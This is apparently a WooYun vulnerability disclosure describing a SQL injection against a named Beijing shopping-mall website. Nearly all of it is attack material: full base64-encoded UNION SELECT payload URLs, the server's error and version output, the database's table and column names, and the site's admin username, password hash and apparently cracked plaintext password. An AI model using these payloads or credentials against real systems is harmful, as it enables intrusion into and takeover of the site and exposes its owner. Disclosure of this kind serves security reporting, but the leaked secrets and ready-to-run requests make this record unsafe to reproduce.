WooYun.org

http://www.yintai-centre.com/
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=MjM=
通过base64工具查询得MJM=为23
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=MjMn
得到You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' limit 1' at line 1
然后进行 order by 编码之后得到order by 9 长度
联合查询：
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNiw3LDgsOQ==
得到5、7两个显示标识。

查询用户、数据库路径、数据库版本
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixjb25jYXQodXNlcigpLEBAZGF0YWRpcixkYXRhYmFzZSgpLHZlcnNpb24oKSksOCw5
得到：
[email protected] /data/mysql/ hdm0570415_db 5.1.48-log
列表
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixncm91cF9jb25jYXQoZGlzdGluY3QgdGFibGVfbmFtZSksOCw5ICBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0weDY4NjQ2RDMwMzUzNzMwMzQzMTM1NUY2NDYy
得到数据库hdm0570415_db中的所有表：
act,act_cat,act_cat_en,activity,activity_copy,activity_en,activity_en_copy,admin,admin_en,brand,brand_20130320,brand_en,category,category_en,download,download_en,footer,footer_en,img_index,img_index_en,lb_cat,lb_cat_en,news,news_en,rotate,rotate_en,service,user,user_en,video,video_en,videosed,videosed_en,zl_downl,zl_downl_en,zt_downl,zt_downl_en
列出admin中的所有字段
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixncm91cF9jb25jYXQoZGlzdGluY3QgY29sdW1uX25hbWUpLDgsOSAgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPTB4NjE2NDZENjk2RQ==
得到
admin_id,username,passwd,super_admin,lastLogin,session
查询账号密码
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixjb25jYXQodXNlcm5hbWUscGFzc3dkKSw4LDkgIGZyb20gYWRtaW4=
得到
admin 95f66ac1d48930df6b281ea2fe24fc7d （z1Y2_Fr8）